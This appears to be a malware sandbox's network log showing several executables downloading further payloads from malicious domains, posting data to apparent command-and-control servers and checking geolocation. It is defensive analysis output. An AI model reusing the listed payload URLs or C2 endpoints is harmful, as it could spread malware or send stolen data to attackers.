GET /1WTBy7 HTTP/1.1
User-Agent: tu9/7
Host: 2no.co
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 09 Sep 2021 04:27:41 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=fc44dno8hc7lfndvbvjl0rkg94; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=247886530; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: a73747424ff9437faaf96c6f81875480de0f3b42e839234d79b260fe618421c8
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
GET

https://2no.co/1WYBy7

Tue11141271fbe5877f.exe

Remote address:

88.99.66.31:443

Request

GET /1WYBy7 HTTP/1.1
Host: 2no.co

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 09 Sep 2021 04:27:41 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=14hreknouqp8hsfrrq99k4pkm3; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=247886530; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers: 1
whoami: c3af235b5b9c8f8c0657cab7c8c85f85d97100c7d13cb4fb6626c667e06b697f
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
DNS

wheelllc.bar

5382906.exe

Remote address:

8.8.8.8:53

Request

wheelllc.bar

IN A

Response

wheelllc.bar

IN A

104.21.64.202

wheelllc.bar

IN A

172.67.136.53
GET

https://wheelllc.bar/api.php

5382906.exe

Remote address:

104.21.64.202:443

Request

GET /api.php HTTP/1.1
Host: wheelllc.bar
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:28:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.1.33
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=d3K78m5A3UYXdWM%2BjcniaD%2Fmw%2FQJXgbYsLQaPyKxpKBjnAIKUAI1FHxEsJRkcXQvz8SmtQT%2FDl0JFx%2FiedPM9WlQQ3D3PTMTsoK4e2hedXT03E2QYm9dtbkhLl1QMjU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68bdaa773ffd0b53-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
POST

https://wheelllc.bar/

5382906.exe

Remote address:

104.21.64.202:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8d97349f1aa3810
Host: wheelllc.bar
Content-Length: 1437
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:30:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.1.33
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sRmsUqVuwbKUQKj8EQ2he0u8W5dct5JxR5KcK2aDTN7Q2RdyJ3s%2FAHxoSn6chVtmW5p5sE%2F1x3vYVA4D1q0XtMJJt07Av%2BIBcLHwBc6fHBlS2R7dgt2LncDSWEPFwKk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68bdad7049c20b53-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
DNS

api.ip.sb

3589249.exe

Remote address:

8.8.8.8:53

Request

api.ip.sb

IN A

Response

api.ip.sb

IN CNAME

api.ip.sb.cdn.cloudflare.net

api.ip.sb.cdn.cloudflare.net

IN A

104.26.12.31

api.ip.sb.cdn.cloudflare.net

IN A

172.67.75.172

api.ip.sb.cdn.cloudflare.net

IN A

104.26.13.31
DNS

phonefix.bar

4218290.exe

Remote address:

8.8.8.8:53

Request

phonefix.bar

IN A

Response

phonefix.bar

IN A

172.67.131.66

phonefix.bar

IN A

104.21.10.67
DNS

connectini.net

Dyjicyrizhe.exe

Remote address:

8.8.8.8:53

Request

connectini.net

IN A

Response

connectini.net

IN A

162.0.210.44
GET

https://phonefix.bar/api.php?getusers

2617197.exe

Remote address:

172.67.131.66:443

Request

GET /api.php?getusers HTTP/1.1
Host: phonefix.bar
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:27:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.1.33
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YuS4BNe3SvOeISni4zNTMniEVeNEehM7comcwAXNz%2FJjRAajkI3ZTBEE1GBvESZBy%2F7OhDYGMbb4Ckinqe3m26KeBCSfpBRBzd62zHUWMrqtUGjOGA4AtQm7WcWKq1c%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68bdaaa4fab7424e-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
GET

https://phonefix.bar/api.php

2617197.exe

Remote address:

172.67.131.66:443

Request

GET /api.php HTTP/1.1
Host: phonefix.bar

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:28:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.1.33
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pm7EwDuqtn4qIye0Aa2iGvvGD%2B4A%2FGMJEdgmJ23nhD7XjN4BGdc7%2BMbUMi7THYMUApgIKIOFqy3UdrUP%2FnWkeQVeJ64dTsTwyCd8QxQCMUHbyKQm4eB5Upa7ZlOF2yQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68bdab519ce1424e-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
POST

https://phonefix.bar/

2617197.exe

Remote address:

172.67.131.66:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8d97349d313ce20
Host: phonefix.bar
Content-Length: 4001
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:28:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.1.33
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LkXatV1SDRevAoP3qdG7pVQkF%2BuVoYpaXD8Ly%2Fy6Q8DTMFCgKG5nP%2BYvxJvo9j67ejL8JfMWb1OgTpAS20WlvAyA2cG%2FeW%2B3RlIzuSzzGwcT5GtbDMizOb1U25fh%2Bew%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68bdac320bf9424e-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
GET

https://api.ip.sb/geoip

2969847.exe

Remote address:

104.26.12.31:443

Request

GET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:27:53 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 285
Connection: keep-alive
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: no-cache
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=54MxnD4n3mm2EwOJuTlNuAOvhgwGNu%2Fm8W%2B5q5tLD1qvAE4XMjlK%2B9vbxavYj7%2B7E1Jsl5xmuj%2FGMcWEiX82yj%2FAFvPcNhBb2SdIFgZOOpdd6ezkg0Txnkp9sQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 68bdaaac790d4c07-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
GET

https://api.ip.sb/geoip

6855562.exe

Remote address:

104.26.12.31:443

Request

GET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:27:53 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 285
Connection: keep-alive
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: no-cache
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7KS4XXTOb6xHZn%2FcKC34gEZJftpbaEQld4pS3%2F5TKqvYc8%2BDr7Xu52L1abkuwLJyuEi4fDSyH5nkfDDF416OPVUtj4oIR9shP3OyWjYku13E0OvB2NjGmvLo%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 68bdaaaa4ed94c5c-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
POST

https://connectini.net/Series/SuperNitou.php

46807GHF____.exe

Remote address:

162.0.210.44:443

Request

POST /Series/SuperNitou.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: connectini.net
Content-Length: 51
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 09 Sep 2021 04:27:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.1.33
X-Powered-By: PleskLin
DNS

crl.usertrust.com

Tue112c483dd3245d.exe

Remote address:

8.8.8.8:53

Request

crl.usertrust.com

IN A

Response

crl.usertrust.com

IN A

151.139.128.14
GET

http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl

Tue112c483dd3245d.exe

Remote address:

151.139.128.14:80

Request

GET /USERTrustRSACertificationAuthority.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.usertrust.com

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:27:56 GMT
Content-Type: application/pkix-crl
Last-Modified: Wed, 08 Sep 2021 05:02:13 GMT
Accept-Ranges: bytes
Server: nginx
ETag: "613843d5-3d2"
X-CCACDN-Mirror-ID: mscrl1
Cache-Control: max-age=14400, s-maxage=3600
X-CCACDN-Proxy-ID: mcdpinlb2
X-Frame-Options: SAMEORIGIN
X-HW: 1631161676.cds142.am5.h2,1631161676.cds281.am5.c
Connection: keep-alive
Content-Length: 978
DNS

safialinks.com

46807GHF____.exe

Remote address:

8.8.8.8:53

Request

safialinks.com

IN A

Response

safialinks.com

IN A

162.0.213.132
GET

http://safialinks.com/Widgets/ultramediaburner.exe

46807GHF____.exe

Remote address:

162.0.213.132:80

Request

GET /Widgets/ultramediaburner.exe HTTP/1.1
Host: safialinks.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:28:22 GMT
Server: Apache
Last-Modified: Tue, 22 Jun 2021 14:14:00 GMT
ETag: "81d73-5c55b66be5a00"
Accept-Ranges: bytes
Content-Length: 531827
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
GET

http://safialinks.com/L3CKQSg3wbJyCsvFNeyUtJP4qUBxcV/cpm-provider/nfdbssmwan23dzjn.exe

46807GHF____.exe

Remote address:

162.0.213.132:80

Request

GET /L3CKQSg3wbJyCsvFNeyUtJP4qUBxcV/cpm-provider/nfdbssmwan23dzjn.exe HTTP/1.1
Host: safialinks.com

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:28:23 GMT
Server: Apache
Last-Modified: Tue, 07 Sep 2021 14:17:24 GMT
ETag: "52c00-5cb686caf0500"
Accept-Ranges: bytes
Content-Length: 338944
Content-Type: application/x-msdos-program
GET

http://safialinks.com/L3CKQSg3wbJyCsvFNeyUtJP4qUBxcV/kenpachi/5d3cdh4z6b5ytg2t.exe

46807GHF____.exe

Remote address:

162.0.213.132:80

Request

GET /L3CKQSg3wbJyCsvFNeyUtJP4qUBxcV/kenpachi/5d3cdh4z6b5ytg2t.exe HTTP/1.1
Host: safialinks.com

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:28:23 GMT
Server: Apache
Last-Modified: Tue, 07 Sep 2021 14:39:14 GMT
ETag: "70a00-5cb68bac40880"
Accept-Ranges: bytes
Content-Length: 461312
Content-Type: application/x-msdos-program
GET

http://safialinks.com/L3CKQSg3wbJyCsvFNeyUtJP4qUBxcV/post-install-provider/r2dcfcbx72q3cxze.exe

46807GHF____.exe

Remote address:

162.0.213.132:80

Request

GET /L3CKQSg3wbJyCsvFNeyUtJP4qUBxcV/post-install-provider/r2dcfcbx72q3cxze.exe HTTP/1.1
Host: safialinks.com

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:28:24 GMT
Server: Apache
Last-Modified: Mon, 06 Sep 2021 16:36:06 GMT
ETag: "30000-5cb563edf4980"
Accept-Ranges: bytes
Content-Length: 196608
Content-Type: application/x-msdos-program
DNS

requestimmersive.com

46807GHF____.exe

Remote address:

8.8.8.8:53

Request

requestimmersive.com

IN A

Response

requestimmersive.com

IN A

162.0.220.187
POST

http://requestimmersive.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg

46807GHF____.exe

Remote address:

162.0.220.187:80

Request

POST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: requestimmersive.com
Content-Length: 224
Expect: 100-continue
Accept-Encoding: gzip
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.21.1
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 51
Date: Thu, 09 Sep 2021 04:28:25 GMT
GET

http://www.google.com/

Suxepufymi.exe

Remote address:

142.250.179.132:80

Request

GET / HTTP/1.1
Host: www.google.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:28:33 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: NID=223=jHPGFqvDM7kuIT06aB5O6u25FZ7sHUlrtC-l1GJ6eB2jFRGAg7i51DhLVQS4Ix3YThLz2el3PHR_psJR35FdboIdy8cqY_wL8eycMwEncso3RnmACb59OzVUKTCxtmc9iM7CU_MyWc1vM1XP4Pooq130XXDIQwmxxuLFONaRgjk; expires=Fri, 11-Mar-2022 04:28:33 GMT; path=/; domain=.google.com; HttpOnly
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
DNS

connectini.net

Dyjicyrizhe.exe

Remote address:

8.8.8.8:53

Request

connectini.net

IN A

Response

connectini.net

IN A

162.0.210.44
POST

https://connectini.net/Series/Conumer4Publisher.php

Suxepufymi.exe

Remote address:

162.0.210.44:443

Request

POST /Series/Conumer4Publisher.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: connectini.net
Content-Length: 53
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 09 Sep 2021 04:28:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.1.33
X-Powered-By: PleskLin
GET

https://connectini.net/Series/publisher/1/NL.json

Suxepufymi.exe

Remote address:

162.0.210.44:443

Request

GET /Series/publisher/1/NL.json HTTP/1.1
Host: connectini.net

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 09 Sep 2021 04:28:44 GMT
Content-Type: application/json
Content-Length: 4908
Last-Modified: Thu, 18 Mar 2021 13:08:23 GMT
Connection: keep-alive
ETag: "605350c7-132c"
X-Powered-By: PleskLin
Accept-Ranges: bytes
DNS

www.profitabletrustednetwork.com

IEXPLORE.EXE

Remote address:

8.8.8.8:53

Request

www.profitabletrustednetwork.com

IN A

Response

www.profitabletrustednetwork.com

IN A

192.243.59.13

www.profitabletrustednetwork.com

IN A

192.243.59.12

www.profitabletrustednetwork.com

IN A

192.243.59.20
DNS

live.goatgame.live

3002.exe

Remote address:

8.8.8.8:53

Request

live.goatgame.live

IN A

Response

live.goatgame.live

IN A

172.67.222.125

live.goatgame.live

IN A

104.21.70.98
DNS

cleaner-partners.biz

setup.exe

Remote address:

8.8.8.8:53

Request

cleaner-partners.biz

IN A

Response

cleaner-partners.biz

IN A

95.181.163.181

cleaner-partners.biz

IN A

46.8.29.181
DNS

ip-api.com

jhuuee.exe

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
GET

https://live.goatgame.live/userf/dat/3002/sqlite.dat

3002.exe

Remote address:

172.67.222.125:443

Request

GET /userf/dat/3002/sqlite.dat HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: live.goatgame.live

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:29:16 GMT
Content-Length: 578669
Connection: keep-alive
last-modified: Wed, 28 Jul 2021 11:35:52 GMT
etag: "8d46d-5c82d6384d5ab"
accept-ranges: bytes
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KL1PMKf%2FD81R3uo3uPz0%2BRxAISK6gOEhlvtbrcHoTLpMcQFGE1ymkyFQPVDOk9dtD7RMHDDCBE0R%2BC2nlqiEqocBBjP2Jr3Tsg8DzD%2BqU7iC3xLPf9YZYVuJWaWmVoOusoguXNM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68bdacb09aadd885-CPH
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
GET

https://live.goatgame.live/userf/dat/sqlite.dll

3002.exe

Remote address:

172.67.222.125:443

Request

GET /userf/dat/sqlite.dll HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: live.goatgame.live

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:29:18 GMT
Content-Type: application/x-msdownload
Content-Length: 13312
Connection: keep-alive
last-modified: Fri, 27 Aug 2021 04:30:17 GMT
etag: "3400-5ca82f0bd6e46"
accept-ranges: bytes
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=q2SJNhndTHdpNlmsffDjjida2tXpWdVQpqcHjrSuhRn3PUVJfukT8FyuswfSExwHkTBAFpm0SfCWu6QF81pomVWdpKv0GzFW4ZZgtAsnrUSq9fKnUBZOTikOSB0%2BNHhlbbmeZqM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68bdacbd4fcbd885-CPH
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
GET

http://cleaner-partners.biz/check.php?pub=mixshop

setup.exe

Remote address:

95.181.163.181:80

Request

GET /check.php?pub=mixshop HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: AM-HO-AN-sg-z-t
Host: cleaner-partners.biz

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 09 Sep 2021 04:29:15 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.16
DNS

qwertys.info

2.exe

Remote address:

8.8.8.8:53

Request

qwertys.info

IN A

Response

qwertys.info

IN A

104.21.20.198

qwertys.info

IN A

172.67.194.30
GET

http://ip-api.com/json/

jhuuee.exe

Remote address:

208.95.112.1:80

Request

GET /json/ HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Host: ip-api.com

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:29:18 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 323
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
DNS

liveme31.com

setup_2.tmp

Remote address:

8.8.8.8:53

Request

liveme31.com

IN A

Response

liveme31.com

IN A

104.21.13.27

liveme31.com

IN A

172.67.132.120
DNS

gavenetwork.bar

PublicDwlBrowser1100.exe

Remote address:

8.8.8.8:53

Request

gavenetwork.bar

IN A

Response
HEAD

http://liveme31.com/74.exe

setup_2.tmp

Remote address:

104.21.13.27:80

Request

HEAD /74.exe HTTP/1.1
Accept: */*
User-Agent: InnoDownloadPlugin/1.5
Host: liveme31.com
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:29:20 GMT
Content-Type: application/octet-stream
Content-Length: 119296
Connection: keep-alive
last-modified: Wed, 01 Sep 2021 13:37:12 GMT
etag: "612f8208-1d200"
expires: Thu, 31 Dec 2037 23:55:55 GMT
cache-control: max-age=315360000
CF-Cache-Status: HIT
Age: 654733
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wxT0KHwO9eb%2FquoOCpNe%2FQ7jBG00eTcRvz%2F1N03a923fHIrhXA%2BsSzVL152ZtTEY4pzZvtpYvy35poGYGWkDXEPXaXoDKA0l2e9Nj9i4w%2FzJn9pyAdeQR%2BPHFG%2BEuwM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68bdacc92ceec83b-AMS
GET

http://liveme31.com/74.exe

setup_2.tmp

Remote address:

104.21.13.27:80

Request

GET /74.exe HTTP/1.1
Accept: */*
User-Agent: InnoDownloadPlugin/1.5
Host: liveme31.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:29:20 GMT
Content-Type: application/octet-stream
Content-Length: 119296
Connection: keep-alive
last-modified: Wed, 01 Sep 2021 13:37:12 GMT
etag: "612f8208-1d200"
expires: Thu, 31 Dec 2037 23:55:55 GMT
cache-control: max-age=315360000
CF-Cache-Status: HIT
Age: 654733
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tlsjJ%2BrgO4TkJt%2Fj4X75ba5S5C4jfC2O3yYi1iem7zNyrcgH%2BKdcCUeYigJiznmlxQnM%2BxQBorM55XJw3IeunaK2XivNejW2MwuFIs8wfRq7WXUuOkjksc1TCJeNLO4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68bdacca9ea8c83b-AMS
DNS

gheorghip.tumblr.com

Alfanewfile2.exe

Remote address:

8.8.8.8:53

Request

gheorghip.tumblr.com

IN A

Response

gheorghip.tumblr.com

IN A

74.114.154.22

gheorghip.tumblr.com

IN A

74.114.154.18
GET

https://qwertys.info/dcc7975c8a99514da06323f0994cd79b.exe

2.exe

Remote address:

104.21.20.198:443

Request

GET /dcc7975c8a99514da06323f0994cd79b.exe HTTP/1.1
Host: qwertys.info
Connection: Keep-Alive

Response

HTTP/1.1 302 Found

Date: Thu, 09 Sep 2021 04:29:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
location: https://retse.info/dcc7975c8a99514da06323f0994cd79b.exe
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vWWXqwcVym1jYFUMO9yPCi03r8qIdX9AQpNez59diWtNj76mSabtNKdNbmFNgIlV2Ev1Df0BnYMqc8IpNXCVuwRAY1KPYwEl3kycB%2BUENrtq125T69FAGgUrdHS7byo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68bdace7fef94c3e-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
GET

https://gheorghip.tumblr.com/

Alfanewfile2.exe

Remote address:

74.114.154.22:443

Request

GET / HTTP/1.1
Host: gheorghip.tumblr.com

Response

HTTP/1.1 200 OK

Server: openresty
Date: Thu, 09 Sep 2021 04:29:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Rid: 53ae96406acc965e15d838343f36be2d
P3p: CP="Tumblr's privacy policy is available here: https://www.tumblr.com/policy/en/privacy"
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=15552001
X-Tumblr-User: gheorghip
X-Tumblr-Pixel-0: https://px.srvcs.tumblr.com/impixu?T=1631161718&J=eyJ0eXBlIjoidXJsIiwidXJsIjoiaHR0cDovL2doZW9yZ2hpcC50dW1ibHIuY29tLyIsInJlcXR5cGUiOjAsInJvdXRlIjoiLyJ9&U=ENMIFFACAG&K=270e1a57d9e6bfc60dcb36b8920dc4deceb1f0156bdd9f3cd4381dd29965f3ad
X-Tumblr-Pixel: 1
Link: <https://assets.tumblr.com/images/default_avatar/cube_closed_128.png>; rel=icon
Set-Cookie: pfg=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.tumblr.com; secure; HttpOnly
X-UA-Compatible: IE=Edge,chrome=1
X-UA-Device: desktop
Vary: X-UA-Device, Accept, Accept-Encoding
DNS

remotenetwork.xyz

PublicDwlBrowser1100.exe

Remote address:

8.8.8.8:53

Request

remotenetwork.xyz

IN A

Response
DNS

iplogger.org

PublicDwlBrowser1100.exe

Remote address:

8.8.8.8:53

Request

iplogger.org

IN A

Response

iplogger.org

IN A

88.99.66.31
DNS

retse.info

2.exe

Remote address:

8.8.8.8:53

Request

retse.info

IN A

Response

retse.info

IN A

172.67.211.113

retse.info

IN A

104.21.77.200
GET

